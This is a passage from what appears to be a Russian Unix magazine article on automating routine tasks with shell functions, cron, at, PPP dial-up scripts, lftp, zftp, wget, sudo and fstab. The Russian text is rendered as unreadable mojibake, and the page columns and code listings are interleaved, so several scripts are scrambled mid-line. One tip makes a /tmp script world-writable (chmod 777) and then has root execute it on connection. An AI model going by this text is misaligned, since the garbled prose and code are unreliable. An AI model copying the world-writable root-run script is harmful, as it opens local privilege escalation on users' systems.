ïðåäñòîÿùèõ òóðíèðîâ â ðàçëè÷íûõ ãîðîäàõ Ðîññèè. Ïîä ýãèäîé ñàéòà åæåêâàðòàëüíî ïðîâîäÿòñÿ êðóïíåéøèå íà òåððèòîðèè ïîñòñîâåòñêîãî ïðîñòðàíñòâà (ïîñëå WCG) òóðíèðû ñåðèè ASUS Open. Ñîâñåì íåäàâíî, â êîíöå íîÿáðÿ 2005 ãîäà, çàâåðøèëñÿ î÷åðåäíîé òóðíèð ñåðèè — ASUS Autumn 2005, ñîáðàâøèé íà ôèíàëå ñâûøå 800 èãðîêîâ èç Ðîññèè è ñîñåäíèõ ñòðàí. Îáùèé ïðèçîâîé ôîíä â äåâÿòè èãðîâûõ äèñöèïëèíàõ ñîñòàâèë ñâûøå 400 òûñÿ÷ ðóáëåé!  2006 ãîäó òóðíèðíàÿ ñåðèÿ áóäåò ðàçâèâàòüñÿ è ïîëó÷èò ñòàòóñ ìåæäóíàðîäíîé, à ïðèçîâîé ôîíä ïðîäîëæèò óâåëè÷èâàòüñÿ.

òðàíñëÿöèÿ ÷àìïà ïî Fifa íà WCG

Ôåððàðè, êîòîðóþ âûèãðàë ëåãåíäàðíûé Thresh

ñàìûé èçâåñòíûé ðóññêèé êèáåðñïîðòèâíûé æóðíàëèñò Polosatiy

BINARY YOUR’S z

099


UNIXOID UNIXOID ///// ISSUE

TEXT J1M / J1M@LIST.RU /

ÇÀÂÎÄÍÎÉ ÏÈÍÃÂÈÍ

BRAIN KEY

ÀÂÒÎÌÀÒÈÇÈÐÓÅÌ ÐÓÒÈÍÍÓÞ ÐÀÁÎÒÓ

ÎÑÎÇÍÀÍÈÅ ÍÅÎÁÕÎÄÈÌÎÑÒÈ ÈÇÎ ÄÍß Â ÄÅÍÜ ÍÀÁÈÐÀÒÜ ÎÄÍÎÒÈÏÍÛÅ ÊÎÌÀÍÄÛ È ÂÛÏÎËÍßÒÜ ÐÓÒÈÍÍÛÅ ÎÏÅÐÀÖÈÈ ÌÎÆÅÒ ÂÂÅÑÒÈ Â ÓÍÛÍÈÅ ËÞÁÎÃÎ ÞÍÈÊÑÎÈÄÀ. ÍÎ ÍÅ ÑÒÎÈÒ ÎÒ×ÀÈÂÀÒÜÑß, *NIX ÌÎÆÅÒ ÂÇßÒÜ ÁÎËÜØÓÞ ×ÀÑÒÜ ÐÀÁÎÒÛ ÍÀ ÑÅÁß. ÌÍÎÃÈÅ ÊÎÌÏÎÍÅÍÒÛ ÎÑ ÊÀÊ ÁÛ ÑÀÌÈ ÍÀÌÅÊÀÞÒ, ×ÒÎÁÛ ÈÕ ÈÑÏÎËÜÇÎÂÀËÈ Â ÑÊÐÈÏÒÀÕ È ÇÀÄÀÍÈßÕ ÏËÀÍÈÐÎÂÙÈÊÀ. ×ÈÒÀÉ ÄÀËÜØÅ, È ÒÛ ÓÇÍÀÅØÜ, ÊÀÊ ÑÁÅÐÅ×Ü ÑÂÎÅ ÂÐÅÌß, ÇÀÑÒÀÂÈ ÎÏÅÐÀÖÈÎÍÊÓ ÂÛÏÎËÍßÒÜ ÒÂÎÞ ÐÀÁÎÒÓ

MECHANICAL PENGUIN

ÈÑÏÎËÜÇÓÉ ÑÊÐÈÏÒÛ, ËÞÊ Ïåðâûé øàã ê àâòîìàòèçàöèè — íàïèñàíèå ñêðèïòîâ. Åñëè îñâîèòü õîòÿ áû àçû øåëëñêðèïòèíãà, òî ñ÷èòàé, ÷òî ïîëîâèíà äåëà óæå ñäåëàíà. ×òîáû íå çàãðîìîæäàòü ñèñòåìó ñêðèïòàìè â îäíó-äâå ñòðîêè, ìîæíî ïðèáåãíóòü ê ïîìîùè ôóíêöèé, îïðåäåëåííûõ â /etc/profile èëè ~/.bashrc, òåì áîëåå ÷òî ñî ñòîðîíû ïîëüçîâàòåëÿ îíè íè÷åì íå áóäóò îòëè÷àòüñÿ îò ñêðèïòîâ. Ñìîòðè ñêðèïò 1. Ýòî òîëüêî ïðèìåð, ïîêàçûâàþùèé óäîáñòâî èñïîëüçîâàíèÿ âñïîìîãàòåëüíûõ ôóíêöèé. Òû íå äîëæåí ñðàçó ðèíóòüñÿ âáèâàòü èõ âñå â ~/.bashrc, íàîáîðîò, ïîäóìàé, êàêèå ïîñëåäîâàòåëüíîñòè êîìàíä òû ÷àñòî èñïîëüçóåøü (è íàñêîëüêî ýòî óòîìèòåëüíî), à çàòåì îôîðìè èõ â âèäå ôóíêöèé èëè ñêðèïòîâ. ÎÑÂÎÉ ÏËÀÍÈÐÎÂÙÈÊ Òâîèìè ëó÷øèìè äðóçüÿìè íà ïóòè ê òîòàëüíîé àâòîìàòèçàöèè ìîãóò ñòàòü cron è at. Èìåííî îíè îòâåòñòâåííû çà çàïóñê ïðîöåññîâ â ôîíå. Äåìîí cron ñ äàâíèõ âðåìåí èñïîëüçóåòñÿ â *nix-ñèñòåìàõ â êà÷åñòâå ïëàíèðîâùèêà çàäàíèé. Åñëè îïðåäåëåííàÿ êîìàíäà äîëæíà çàïóñêàòüñÿ ñ çàäàííûì èíòåðâàëîì âðåìåíè (êàæäûé ÷àñ, êàæäóþ íî÷ü, êàæäûé ìåñÿö), òî ëó÷øåãî ñðåäñòâà, ÷åì cron äëÿ îñóùåñòâëåíèÿ ýòîé çàäà÷è íå íàéòè. Íàïðèìåð, ìû õîòèì, ÷òîáû êàæäûé äåíü ðîâíî â ñåìü ÷àñîâ âå÷åðà çàïóñêàëñÿ íàø ñêðèïò. Ñîçäàåì â äîìàøíåì êàòàëîãå ôàéë ~/.crontab ñ òàêèì ñîäåðæèìûì: 0 19 * /usr/bin/our-script

100

*

*

PAD

STOMACH

ôàéë /var/spool/cron/crontabs/root èç Slackware

Çàãàäî÷íûå ÷èñëà è çâåçäî÷êè ïåðåä èìåíåì ñêðèïòà îçíà÷àþò âðåìÿ åãî çàïóñêà â òàêîì ïîðÿäêå: ìèíóòà, ÷àñ, äåíü, ìåñÿö, äåíü íåäåëè. Çâåçäî÷êè âìåñòî äíÿ è ìåñÿöà îçíà÷àþò, ÷òî ñêðèïò äîëæåí âûïîëíÿòüñÿ êàæäûé äåíü ìåñÿöà. Òåïåðü âûïîëíÿåì êîìàíäó: $ crontab ~/.crontab

Îñòàëîñü òîëüêî äîæäàòüñÿ 19:00 è ïîëþáîâàòüñÿ ðåçóëüòàòîì. Íåñêîëüêî çàìå÷àíèé: 1 Ïðîïèñàííûå â crontab êîìàíäû èñïîëíÿþòñÿ èíòåðïðåòàòîðîì /bin/sh ñ òðåìÿ çàäàííûìè ïåðåìåííûìè îêðóæåíèÿ: USER, HOME è SHELL. Òàê êàê ïåðåìåííàÿ PATH íå îïðåäåëåíà, òû äîëæåí óêàçûâàòü ïîëíûé ïóòü ê áèíàðíèêó. 2 Åñëè íàñòðîåíà ëîêàëüíàÿ ïî÷òîâàÿ ñèñ-

òåìà, òî âåñü âûâîä êîìàíäû îòïðàâëÿåòñÿ ïîëüçîâàòåëþ â ïèñüìå. Äëÿ âûïîëíåíèÿ òîëüêî îäíîãî-äâóõ çàäàíèé ôóíêöèîíàëüíîñòü cron ìîæåò îêàçàòüñÿ èçáûòî÷íîé.  ýòîì ñëó÷àå ëó÷øå ïðèáåãíóòü ê ïîìîùè êîìàíäû at. Îí êàê ðàç ïðåäíàçíà÷åí äëÿ îäíîêðàòíîãî âûïîëíåíèÿ çàäàíèÿ è âíóòðåííå óñòðîåí ãîðàçäî ïðîùå. Äëÿ ïðèìåðà çàïóñòèì òîò æå ñêðèïò â òî æå âðåìÿ: $ at 19:00 at> /usr/bin/our-script CTRL-D

Î÷åíü ïðîñòî è êðàñèâî, íå ïðàâäà ëè?

XÀÊÅÐ 01 /85/ 06


ÂËÀÄÅËÜÖÀÌ ÂÛÄÅËÅÍÍÛÕ Ë ÈÍÈÉ ÍÈ×ÅÃÎ ÀÂÒÎÌÀÒÈÇÈÐÎ ÂÀÒÜ ÍÅ ÍÀÄÎ # vi ~/.bashrc # ñîçäàíèå tar.bz2-àðõèâà êàòàëîãà function tbz2() { if [ $# != 0 ]; then tar cv $1 | bzip2 -9cz > $1.tar.bz2 fi } # ðàñïàêîâêà tar.bz2-àðõèâà function utbz2() { if [ $# != 0 ]; then tar xjvf $1 fi } # «óìíîå» âûäâèæåíèå ëîòêà CD-ROM function ejectcd() { local cdrom=/mnt/cdrom lsof $cdrom if [ $? -ne 0 ]; then

at âûïîëíÿåò íàøó êîìàíäó

Âðåìÿ èñïîëíåíèÿ ìîæíî íàçíà÷èòü íà ëþáîé äåíü, èñïîëüçóÿ òàêîé ôîðìàò: «at ÷àñ:ìèíóòà /ìåñÿö/äåíü/ãîä». Åùå ìíå íðàâèòñÿ âîò òàêîé ñòèëü óêàçàíèÿ âðåìåíè: «at now + 2 hours» — âûïîëíèòü êîìàíäó ÷åðåç 2 ÷àñà, «at now + 1 day2» — íà ñëåäóþùèé äåíü. Êàê è cron, at ìîæåò ïîçàáîòèòüñÿ î òîì, ÷òîáû ïîëüçîâàòåëü ïîëó÷èë óâåäîìëåíèå î âûïîëíåííîì çàäàíèè ïî ïî÷òå. Äëÿ óäàëåíèÿ íåíóæíîãî çàäàíèÿ ïîñìîòðè åãî èäåíòèôèêàòîð â ñïèñêå çàäàíèé (êîìàíäà atq), à çàòåì èñïîëüçóé êîìàíäó «atrm èäåíòèôèêàòîð» äëÿ óäàëåíèÿ.

eject $cdrom fi } # ñîçäàíèå îáðàçà CD function cdimg() { local cdrom=/mnt/cdrom if [ $# != 0 ]; then dd conv=noerror if=/dev/cdrom of=$1.img fi } # ïåðåêîäèðîâàíèå àóäèîäèñêà â ogg vorbis function cdogg() { cdparanoia -B for wav in track*.wav; do

ÀÂÒÎÌÀÒÈÇÈÐÓÉ ÈÍÒÅÐÍÅÒ-ÑÎÅÄÈÍÅÍÈß Ïðèøëî âðåìÿ àâòîìàòèçèðîâàòü òâîè ìíîãî÷èñëåííûå èíòåðíåò-ñîåäèíåíèÿ. Ñêàæó ñðàçó, ÷òî ýòîò ðàçäåë áóäåò ïîëåçåí òîëüêî äëÿ äèàëàïùèêîâ. Ïðè÷èíû ïðîñòû. Âëàäåëüöàì âûäåëåííûõ ëèíèé íè÷åãî àâòîìàòèçèðîâàòü íå íàäî, ñîåäèíåíèå ñ ñåòüþ èíèöèàëèçèðóåòñÿ íà ýòàïå çàãðóçêè ÎÑ áåç ó÷àñòèÿ ïîëüçîâàòåëÿ. Ñ äðóãîé ñòîðîíû, «ñ÷àñòëèâûì» îáëàäàòåëÿì ìîäåìîâ ïðèõîäèòñÿ íå òîëüêî îãðàíè÷èâàòü âðåìÿ, ïðîâåäåííîå â èíåòå (ïîìèíóòíàÿ òàðèôèêàöèÿ), íî è ê òîìó æå îòîäâèãàòü åãî ïîáëèæå ê íî÷è (äåøåâëå). Âûõîä: çàñòàâèòü ÎÑ çâîíèòü íî÷üþ ïðîâàéäåðó è çàáèðàòü ïî÷òó è íóæíûå ôàéëû. Ïðåäëàãàþ òâîåìó âíèìàíèþ îäíî èç âîçìîæíûõ ðåøåíèé. Îòêðûâàåì ôàéë /etc/ppp/ip-up è ïèøåì â íåãî ñëåäóþùåå:

oggenc $wav rm -f $wav

# vi /etc/ppp/ip-up

done }

#!/bin/sh

# ïîèñê ôàéëà ïî øàáëîíó

# îòïðàâëÿåì ïî÷òó (òîëüêî åñëè ó òåáÿ óñòàíîâëåí ëîêàëüíûé ïî÷òîâûé ñåðâåð)

function ff() {

/usr/sbin/sendmail -q find . -type f -iname \*$1\* -ls ;

}

# çàïóñêàåì ôàéë /tmp/ppp-auto if [ -x /tmp/ppp-auto ]; then

# ïðèâåäåíèå èìåíè ôàéëà ê íèæíåìó ðåãèñòðó

/tmp/ppp-auto

function lcase() {

# óäàëÿåì óæå íåíóæíûé ôàéë

if [ $# != 0 ]; then

rm -f /tmp/ppp-auto

mv $1 `echo $1 | tr '[:upper:]' '[:lower:]'`

# îòêëþ÷àåìñÿ

fi

/usr/sbin/ppp-off

}

fi

# óñòàíîâêà çàãîëîâêà xterm function xtitle() { if [ $# != 0 ]; then echo -e "\033]0;$1\007" fi

Âìåñòî ñòðîêè /usr/sbin/ppp-off ïðîïèøè êîìàíäó, ñ ïîìîùüþ êîòîðîé òû îòêëþ÷àåøüñÿ îò ñåòè. Åñëè äåìîí pppd íàéäåò ôàéë /tmp/ppp-auto, îí åãî âûïîëíèò è ðàçîðâåò ñîåäèíåíèå. Òåïåðü ñîçäàäèì øàáëîí ôàéëà ppp-auto:

} # ñîçäàíèå ñíèìêà ðàáî÷åãî ñòîëà

# vi ~/ppp-auto

function sshot() { import -window root ~/screenshot.png }

#!/bin/sh # ôàéë èñïîëíÿåòñÿ îò ðóòà, à íàøè êîìàíäû äîëæíû èñïîëíÿòüñÿ îò îáû÷íîãî

ÏÎ ÏÎÂÎÄÓ BSD

1. BSD-ñèñòåìû îáû÷íî êîìïëåêòóþòñÿ ïðîãðàììîé curl, âî ìíîãîì ñõîæåé ïî ôóíêöèîíàëüíîñòè ñ wget. 2. Äåìîí ppp, ðàáîòàþùèé â ïðîñòðàíñòâå ïîëüçîâàòåëÿ, ïîñëå óñòàíîâêè ñîåäèíåíèÿ çàïóñêàåò ôàéë /etc/ppp/ppp.linkup.

ïîëüçîâàòåëÿ /bin/su — èìÿ_ïîëüçîâàòåëÿ # çàáèðàåì ïî÷òó fetchmail # ïåðåõîäèì â ñïåöèàëüíûé êàòàëîã cd ~/download # ñêà÷èâàåì íóæíûå ôàéëû wget ftp://... wget http://...

XÀÊÅÐ 01 /85/ 06

101


UNIXOID ///// ISSUE

ÈÑÏÎËÜÇÓß ÎÄÈÍ ÑÊÐÈÏÒ, Ì ÎÆÍÎ ÎÐÃÀÍÈÇÎÂÀÒÜ ÑÎÅÄÈÍÅÍÈÅ ÑÐÀÇÓ Ñ ÍÅÑÊÎ ËÜÊÈÌÈ FTP-ÑÅÐÂÅÐÀÌÈ. Óñòàíîâè ïîëíûå ïðàâà íà ýòîò ôàéë: if [ $# != 0 ]; then VER=$1

$ chmod 777 ~/ppp-auto else

Âñå. Òåïåðü òåáå íóæíî åãî çàïîëíèòü, ñêîïèðîâàòü â êàòàëîã /tmp è íàçíà÷èòü âðåìÿ ñîåäèíåíèÿ ñ ïîìîùüþ at:

fi

$ cp ~/ppp-auto /tmp/ppp-auto

zmodload zsh/zftp

exit

$ at 02:10 at> /usr/sbin/ppp-on

echo -n "Connecting to $FTP... " zftp open $FTP

Çàìåíè /usr/sbin/ppp-on íà êîìàíäó, ñ ïîìîùüþ êîòîðîé òû óñòàíàâëèâàåøü ñîåäèíåíèå. Îáðàòè âíèìàíèå, ÷òî òàêèå êîìàíäû îáû÷íî òðåáóþò ïðèâèëåãèé root, ïîýòîìó ìîæíî: a) íàñòðîèòü sudo (ñì. íèæå) èëè á) çàïóñòèòü at îò root'à. Êîíå÷íî, ðåøåíèå íåñêîëüêî òîïîðíîå, íî çàòî î÷åíü ïðîñòîå.  äàííîì ñëó÷àå õîðîøèì äîïîëíåíèåì ìîæåò ñòàòü çàïèñü ðåçóëüòàòîâ âûïîëíåíèÿ êîìàíä â ôàéë è îòïðàâêà åãî ïî ïî÷òå ñ ïîìîùüþ êîìàíäû /usr/bin/mail (èëè mailx).

zftp login anonymous "" >/dev/null 2>&1 zftp binary zftp cd pub/linux/kernel/v`echo $VER | cut -d "." -f 1-2`/ echo "Checking for new kernel..." zftp ls | grep linux-${VER} if [[ $? == 0 ]]; then echo -n "Downloading... " zftp get linux-${VER}.tar.bz2 > linux-${VER}.tar.bz2

ÍÅ ÏÐÈÂÛÊÀÉ Ê ÁÐÀÓÇÅÐÓ Ñ ñîåäèíåíèåì ðàçîáðàëèñü, òåïåðü ïîãîâîðèì îá àâòîìàòè÷åñêîì ñêà÷èâàíèè ôàéëîâ. Äëÿ íà÷àëà ïîïðîáóåì çàñòàâèòü ftp-êëèåíò ðàáîòàòü â àâòîíîìíîì ðåæèìå. Äëÿ îñóùåñòâëåíèÿ çàäóìàííîãî íàì ïîíàäîáèòñÿ ïðîäâèíóòûé lftp (åñòü â ëþáîì äèñòðèáóòèâå). Âûïîëíåíèå êîìàíä â ïàêåòíîì ðåæèìå ÿâëÿåòñÿ îäíîé èç åãî îñîáåííîñòåé. ×òîáû âîñïîëüçîâàòüñÿ åþ, ñîçäàé ôàéë ~/lftp.auto ïðèìåðíî ñ òàêèì ñîäåðæèìûì: $ vi ~/lftp.auto # çàäàåì èìÿ è ïàðîëü ïîëüçîâàòåëÿ (ïóñòîé ïàðîëü — "") user name passwd # ïîäêëþ÷àåìñÿ ê ñåðâåðó lftp ftp.kernel.org # äàëåå èäóò ëþáûå ñòàíäàðòíûå êîìàíäû ftp-ïðîòîêîëà (get, put, ls) get ...

zftp close else echo "Kernel $VER doesn't exist." zftp close fi

Ñêðèïò ïðåäíàçíà÷åí äëÿ çàêà÷êè ÿäðà Linux ñ îôèöèàëüíîãî ftp-ñåðâåðà. Çàïóñêàòü ñëåäóåò ñ îäíèì ïàðàìåòðîì — âåðñèåé ÿäðà. Êàê ìîæíî çàìåòèòü, zftp îïåðèðóåò ñòàíäàðòíûìè êîìàíäàìè ëþáîãî ftpêëèåíòà ñ òîé ëèøü ðàçíèöåé, ÷òî ïîñëå èñïîëíåíèÿ êàæäîé êîìàíäû óïðàâëåíèå âîçâðàùàåòñÿ îáðàòíî ê øåëëó. Áëàãîäàðÿ ýòîé îñîáåííîñòè ìîæíî ïîëíîñòüþ êîíòðîëèðîâàòü âåñü äèàëîã êëèåíòà ñ ñåðâåðîì, äëÿ ÷åãî ðàíüøå ïðèõîäèëîñü èñïîëüçîâàòü expect. Åñëè åñòü íåîáõîäèìîñòü ñëèòü ôàéëû ñ http-ñåðâåðà, ìîæíî âîñïîëüçîâàòüñÿ íåèíòåðàêòèâíûì http-êëèåíòîì wget. ß ïðèìåíÿþ åãî â àâòîíîìíûõ èíòåðíåò-ñîåäèíåíèÿõ, êàê áûëî ïîêàçàíî â ïðåäûäóùåì ðàçäåëå.

# îòêëþ÷àåìñÿ exit

$ wget URL

Çàäàé ïðàâèëüíûå ïðàâà äîñòóïà íà ýòîò ôàéë (÷òîáû íèêòî íå ïîäñìîòðåë ïàðîëü):

Ftp-êëèåíò âûïîëíèò âñå òâîè êîìàíäû è îòêëþ÷èòñÿ îò ñåðâåðà. Îòâåòû ñåðâåðà íà ïðèâåäåííûå êîìàíäû çàïèøóòñÿ â ôàéë ~/lftp.log (ïî óìîë÷àíèþ îíè âûâîäÿòñÿ íà ýêðàí). Ýòîò ôàéë ìîæåò ñòàòü î÷åíü ïîëåçíûì, åñëè â ñêðèïòå ïðèìåíÿåòñÿ êîìàíäà ðåêóðñèâíîãî îáõîäà êàòàëîãîâ (ls -R). Èñïîëüçóÿ îäèí ñêðèïò, ìîæíî îðãàíèçîâàòü ñîåäèíåíèå ñðàçó ñ íåñêîëüêèìè ftp-ñåðâåðàìè. Ñîåäèíåíèÿ ñ ftp ìîæíî ñäåëàòü åùå áîëåå àâòîíîìíûìè, åñëè èñïîëüçîâàòü ðàñøèðåíèå zsh ïîä íàçâàíèåì zftp. Ýòî âñòðîåííûé â øåëë ftp-êëèåíò, ïîçâîëÿþùèé èíòåãðèðîâàòü êîìàíäû ftp-ïðîòîêîëà ïðÿìî â ñêðèïòû. Äëÿ äåìîíñòðàöèè ìîùè òàêîé òåõíîëîãèè ðàññìîòðèì ñëåäóþùèé ñêðèïò:

Ôàéë áóäåò ñêà÷àí â òåêóùèé êàòàëîã. Òû ìîæåøü ñòîëêíóòüñÿ ñ ñèòóàöèåé, êîãäà ôàéë èìååò ñëèøêîì áîëüøîé ðàçìåð è íå ìîæåò áûòü ñëèò â ðàìêàõ îäíîãî ñîåäèíåíèÿ. Êàê áûòü? Åñëè çíà÷èòåëüíàÿ ÷àñòü ôàéëà óæå ñêîïèðîâàíà, à âðåìÿ ïîäæèìàåò, òî ìîæíî ïðèáèòü wget ëèáî êîìàíäîé «killall wget», ëèáî êîìáèíàöèåé «CTRL+C». Âî âðåìÿ ñëåäóþùåãî ñåàíñà ñîåäèíåíèÿ íàäî âîçîáíîâèòü ïðîöåññ ñêà÷èâàíèÿ êîìàíäîé:

$ vi ~/get_kernel.zsh

$ wget -c URL

$ chmod 600 ~/lftp.auto

È çàïóñòè lftp òàêîé êîìàíäîé: $ lftp -f ~/lftp.auto > ~/lftp.log

#!/bin/zsh FTP=ftp.kernel.org

102

íàø ñêðèïò ðàáîòàåò!

À åùå wget ìîæíî ïðåâðàòèòü â íàñòîÿ-

XÀÊÅÐ 01 /85/ 06


ñåàíñ zftp

ùåãî web-ðîáîòà, ñêîïèðóþùåãî ïî òâîåìó æåëàíèþ õîòü öåëûé ñàéò. Äëÿ ýòîãî èñïîëüçóé ôëàã -r, êîòîðûé ïðåäïèñûâàåò wget ðåêóðñèâíî ñëåäîâàòü ïî ññûëêàì è ñêà÷èâàòü âñå ñòðàíèöû, ëîãè÷åñêè ðàñïîëîæåííûå íèæå çàäàííîãî URL. ×òîáû wget íå íàêà÷àë âñÿêîãî áàðàõëà, ñêðûòîãî ãëóáîêî â íåäðàõ ñàéòà, èñïîëüçóé îïöèþ '-l ÷èñëî' äëÿ óêàçàíèÿ ìàêñèìàëüíîé ãëóáèíû ðåêóðñèè. Òàêæå â wget ïðåäóñìîòðåí ôëàã -m, ÿâëÿþùèéñÿ ñèíîíèìîì îïöèé: -r, -N (ïîëó÷àòü òîëüêî ôàéëû, îáíîâëåííûå ñî âðåìåíè ïîñëåäíåãî ñêà÷èâàíèÿ) -l inf (áåñêîíå÷íàÿ ðåêóðñèÿ) -nr (ñîõðàíÿòü ôàéëû .listing, ãåíåðèðóåìûå ftp-êëèåíòàìè). Íàçíà÷åíèå ôëàãà -m — ñîçäàíèå òî÷íîãî çåðêàëà ñàéòà. ÍÅ ÇËÎÓÏÎÒÐÅÁËßÉ ÌÛØÜÞ Ãîðÿ÷èå êëàâèøè â ìåíåäæåðàõ îêîí èëè ïðîãðàììå screen — åùå îäèí ýôôåêòèâíûé ñïîñîá ïîâûñèòü òâîþ ïðîèçâîäèòåëüíîñòü. Âñå ñîâðåìåííûå ìåíåäæåðû îêîí ïðåäîñòàâëÿþò ïîëüçîâàòåëþ âîçìîæíîñòü íàçíà÷àòü ãîðÿ÷èå êëàâèøè íà çàïóñê ïðèëîæåíèé. Íàïðèìåð, çàïóñê ýìóëÿòîðà òåðìèíàëà (xterm, rxvt, kterm) ìîæíî «ïîâåñèòü» íà êîìáèíàöèþ <Alt+T> è íå ìó÷èòüñÿ áîëüøå ñ ìåíþøêàìè è êëèêàíüåì ìûøêîé ïî èêîíêàì. Òàêæå ñîâåòóþ íàçíà÷èòü íà ãîðÿ÷èå êëàâèøè ôóíêöèè ïî ðàáîòå ñ îêíàìè (îñîáåííî ðàçâîðà÷èâàíèå íà âåñü ýêðàí è çàêðûòèå). Î÷åíü óäîáíî. Êñòàòè, èçâåñòíûé â óçêèõ êðóãàõ «ìåíåäæåð îêîí äëÿ ãèêîâ» Ion ïîëíîñòüþ óïðàâëÿåòñÿ ñ êëàâèàòóðû. ÏÎËÜÇÓÉÑß ÀÂÒÎÇÀÏÓÑÊÎÌ Íàâåðíÿêà ó òåáÿ åñòü ïðîãðàììû, êîòîðûå òû áû õîòåë çàïóñêàòü ïðè êàæäîé çàãðóçêå ÎÑ, ëîãèíå ïîëüçîâàòåëÿ èëè çàïóñêå èêñîâ. Äëÿ äîñòèæåíèÿ ýòèõ öåëåé ìîæíî èñïîëüçîâàòü òðè ôàéëà: 1 /etc/rc.d/rc.local (ïðèñóòñòâóåò âî ìíîãèõ äèñòðèáóòèâàõ Linux). Ýòîò øåëë-ñêðèïò èñïîëíÿåòñÿ ñ ïðèâèëåãèÿìè root íà ïîñëåäíåé ñòàäèè çàãðóçêè. Ñþäà ìîæíî ïðîïèñàòü êîìàíäû äëÿ ñìåíû ðàçðåøåíèÿ è ïàðàìåòðîâ êîíñîëè (fbset è setterm) è çàïóñêà äåìîíîâ, äëÿ êîòîðûõ íå ñóùåñòâóåò ñîîòâåòñòâóþùèõ èíèöèàëèçàöèîííûõ ñêðèïòîâ. 2 ~/.bashrc (~/.zshrc, ~/.cshrc (â çàâèñèìîñòè îò èñïîëüçóåìîãî øåëëà). Çàïóñêàåòñÿ ïðè êàæäîì ëîãèíå. 3 ~/.xinitrc (èëè ~/.xsession (åñëè èêñû çàïóñêàþòñÿ àâòîìàòè÷åñêè). Êîìàíäû ýòîãî ôàéëà èñïîëíÿþòñÿ X-ñåðâåðîì ïðè åãî çàïóñêå. Ñþäà ìîæíî çàïèñàòü êîìàíäû, ñòàðòóþùèå ðàçëè÷íûå ïðèëîæåíèÿ. Íàïðèìåð:


UNIXOID ///// ISSUE

ÅÙÅ ÍÅÑÊÎËÜÊÎ ÑËÎÂ Î CRON

1. Íåñìîòðÿ íà òî, ÷òî cron óìååò ÷èòàòü crontab-ôàéëû èç ëþáîãî êàòàëîãà, ñòàíäàðòíûì ìåñòîì õðàíåíèÿ ÿâëÿåòñÿ /var/spool/cron/crontabs. 2. Âî ìíîãèõ ñèñòåìàõ èñïîëüçóåòñÿ Vixie Cron, êîòîðûé ïîçàáîòèòñÿ î òîì, ÷òîáû çàäàíèå áûëî âûïîëíåíî, äàæå åñëè â íàçíà÷åííîå âðåìÿ ýòî áûëî íåâîçìîæíî ñäåëàòü (íàïðèìåð, ìàøèíà áûëà âûêëþ÷åíà).

ìîé /etc/rc.d/rc.local

$ vi ~/.xinitrc # çàïóñêàåì ýìóëÿòîð òåðìèíàëà, gkrellm è fluxbox rxvt & gkrellm & exec fluxbox

íàñòðîéêè sudo, ðàçðåøàþùèé ïîëüçîâàòåëþ unixoid âûïîëíÿòü êîìàíäû: /sbin/halt, /sbin/reboot, /usr/sbin/ppp-on è /usr/sbin/ppp-off. # visudo # çàäàåì ïñåâäîíèì äëÿ ëîêàëüíîãî õîñòà Host_Alias LOCAL = localhost

ÈÇÁÀÂÜÑß ÎÒ ROOT-ÇÀÂÈÑÈÌÎÑÒÈ Íàâåðíîå, íåðåäêî ïåðåä òîáîé âñòàåò ïðîáëåìà íåäîñòàòêà ïðàâ îáû÷íîãî ïîëüçîâàòåëÿ äëÿ èñïîëíåíèÿ íåêîòîðûõ êîìàíä. ×òî äåëàòü â ýòîì ñëó÷àå?  îáû÷íûõ óñëîâèÿõ äëÿ âûïîëíåíèÿ íåîáõîäèìîé êîìàíäû ëó÷øèì ðåøåíèåì áóäåò èñïîëüçîâàíèå /bin/su ñ ôëàãîì -c. Íî åñëè äîáàâèòü âûçîâ su â ñêðèïò, òî îí ïðîñòî çàñòîïîðèòñÿ â îæèäàíèè ïàðîëÿ. Äëÿ îáõîäà ýòîé ïðîáëåìû ìîæíî èñïîëüçîâàòü /usr/bin/sudo, êîòîðûé ìîæíî íàñòðîèòü òàê, ÷òîáû îí íå òðåáîâàë ðó÷íîãî ââîäà ïàðîëÿ.  ñëåäóþùåì ëèñòèíãå ïîêàçàí ïðèìåð

# ïñåâäîíèìû äëÿ íåîáõîäèìûõ êîìàíä Cmnd_Alias HALT = /sbin/halt, /sbin/reboot Cmnd_Alias PPP = /etc/ppp/ppp-on, /etc/ppp/ppp-off # ðàçðåøàåì ïîëüçîâàòåëþ unixoid âûïîëíÿòü âûøåïåðå÷èñëåííûå êîìàíäû íà ëîêàëüíîì õîñòå áåç çàïðîñà ïàðîëÿ unixoid LOCAL = NOPASSWD: HALT, PPP

ÍÅ ÌÎÍÒÈÐÓÉ ÂÐÓ×ÍÓÞ Ïðåäñòàâü ñèòóàöèþ: ïðèõîäèò ê òåáå äðóã ñ ôëåøêîé, òû åå ïîäêëþ÷àåøü è, ÷òîáû ïîëó÷èòü äîñòóï ê ôàéëàì, íàáèðàåøü òàêóþ êîìàíäó (äà åùå è îò root'à): # mount -t vfat /dev/sda1 /mnt/flash

Ñëèøêîì äëèííî äëÿ îäíîé ìàëåíüêîé ôëåøêè :). À ýòî åùå è ñàìûé êîðîòêèé âàðèàíò, áåç óñòàíîâêè êîäèðîâêè. Íåò, òàê íå ïîéäåò. Ëó÷øå ñðàçó äîáàâèì ñòðîêó "/dev/sda1 /mnt/flash vfat user,umask=000,iocharset=koi8-r,codepage=866,showexec 0 0" â /etc/fstab. Îòìàòûâàåì ïëåíêó íàçàä: ...ïðèõîäèò äðóã ñ ôëåøêîé, ïîäêëþ÷àåøü, ïîëó÷àåøü äîñòóï ê ôàéëàì (root óæå íå íóæåí): $ mount /mnt/flash

Âîò è âñå! È ðóññêèå áóêâû íà ìåñòå. ìîé ~/.zshrc

104

BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


UNIXOID UNIXOID ///// ISSUE

TEXT ANDREY MATVEEV / ANDRUSHOCK@REAL.XAKEP.RU / TEXT ANTON KARPOV / TOXA@REAL.XAKEP.RU /

SPAMD — ÑÅÊÐÅÒÍÛÉ ÊÎÍÒÐÓÄÀÐ ÂÑÅ ÍÀ ÁÎÐÜÁÓ ÑÎ ÑÏÀÌÎÌ!

